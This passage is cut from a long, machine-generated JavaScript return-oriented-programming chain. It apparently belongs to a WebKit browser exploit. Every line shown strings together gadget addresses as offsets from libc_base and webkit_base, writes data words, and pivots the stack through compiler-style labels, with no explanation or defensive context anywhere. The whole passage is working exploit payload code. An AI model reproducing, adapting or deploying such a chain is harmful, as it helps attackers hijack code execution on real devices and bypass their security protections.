; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L11378: db([0, 0]); // 0x0 set_gadgets([ ropchain+519296, //L11378+24 ropchain+520304, //L11372 libc_base+764760, //pop rsi ropchain+519336, //L11379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11379: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11381: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+519456, //L11384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+519440, //L11382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11382: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11384: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+519632, //L11387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov 
rax, [rsi] libc_base+764760, //pop rsi ropchain+519648, //L11388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+519600, //L11385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+519616, //L11386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11385: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11386: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11387: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11388: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+519744, //L11390 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+519728, //L11389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11389: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11390: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+519832, //L11392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L11391: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L11392: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+519888, //L11393 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11393: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11395: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+519968, //L11397 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11397: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+520104, //L11400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+520088, //L11399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11398: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11399: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11400: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+520192, //L11401 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+520224, //L11403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11401: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11402: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11403: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+520296, //L11404 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11404: db([0, 0]); // 0x0 //L11372: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+520424, //L11407 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+520440, //L11408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+520408, //L11406 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 webkit_base+3236123 //pop r9 ]); //L11406: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11407: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11408: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+520584, //L11411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+520600, //L11412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+520552, //L11409 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11409: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11410: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L11411: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11412: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+520672, //L11413 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11413: db([0, 0]); // 0x0 //L11337: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+520800, //L11416 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+520816, //L11417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+520784, //L11415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11415: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11416: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11417: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+520928, //L11419 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+520976, //L11422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+520944, //L11420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11419: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11420: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11421: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11422: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+521088, //L11423+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+521080, //L11423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L11423: db([0, 0]); // 0x0 set_gadgets([ ropchain+521104, //L11423+24 ropchain+524848, //L11418 libc_base+764760, //pop rsi ropchain+521144, //L11424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11424: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11426: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+521264, //L11429 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+521248, //L11427 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11427: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11429: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+521408, //L11432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+521376, //L11430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+521392, //L11431 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11430: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11431: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11432: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+521488, //L11433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11433: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11435: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+521608, //L11438 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+521592, //L11436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11436: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11438: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+521752, //L11441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+521720, //L11439 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+521736, //L11440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11439: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11440: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11441: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+521840, //L11443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L11442: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L11443: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+521896, //L11444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11444: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11446: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+521976, //L11448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11448: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+522088, //L11449 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11449: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11451: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+522208, //L11454 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+522192, //L11452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11452: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L11454: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+522352, //L11457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+522320, //L11455 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+522336, //L11456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11455: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11456: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11457: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+522432, //L11458 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11458: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11460: db([4294967208, 4294967295]); // -0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+522552, //L11463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+522536, //L11461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11461: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11463: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+522696, //L11466 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+522664, //L11464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+522680, //L11465 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 libc_base+763368 //pop rcx ]); //L11464: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11465: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11466: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+522784, //L11468 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L11467: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L11468: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+522840, //L11469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11469: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11471: db([4294967208, 4294967295]); // -0x58 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+522920, //L11473 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11473: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+523072, //L11475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+523088, //L11476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+523056, //L11474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11474: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11475: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11476: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+523248, //L11480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+523216, //L11478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+523232, //L11479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11477: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L11478: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11479: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11480: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+523304, //L11482 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L11482: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+523432, //L11484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+523448, //L11485 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+523416, //L11483 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11483: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11484: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11485: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+523608, //L11489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+523576, //L11487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+523592, //L11488 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L11486: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L11487: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11488: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11489: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+523664, //L11491 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L11491: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+523792, //L11493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+523808, //L11494 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+523776, //L11492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11492: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11493: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11494: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+523968, //L11498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+523936, //L11496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+523952, //L11497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11495: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L11496: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11497: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11498: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+524024, //L11500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L11500: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+524152, //L11502 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+524168, //L11503 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+524136, //L11501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11501: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11502: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11503: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+524248, //L11504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+524264, //L11505 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11504: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11505: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+524360, //L11507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+524344, //L11506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11506: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11507: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+524440, //L11508 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11508: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11510: db([16, 0]); // 0x10 
set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+524560, //L11513 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+524544, //L11511 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11511: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11513: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+524640, //L11515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+524672, //L11517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11515: db([0, 0]); // 0x0 set_gadgets([ libc_base+759608, //pop rax //L11516: ropchain+524800, //L11514 libc_base+144605 //pop rdi ]); //L11517: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+524776, //L11519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+524792, //L11518 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L11519: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L11518: db([0, 0]); // 0x0 //L11514: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+524864, //L11520 //L11418: libc_base+782311, //pop rsp ropchain+524880, //L11521 //L11520: libc_base+782311, //pop rsp ropchain+515592, //L11288 //L11521: libc_base+764760, //pop rsi ropchain+524920, //L11522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop 
rcx ]); //L11522: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11524: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+525040, //L11527 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+525024, //L11525 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11525: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11527: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+525216, //L11530 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+525232, //L11531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+525184, //L11528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+525200, //L11529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11528: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11529: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11530: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11531: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+525328, //L11533 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+525312, //L11532 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11532: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11533: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax 
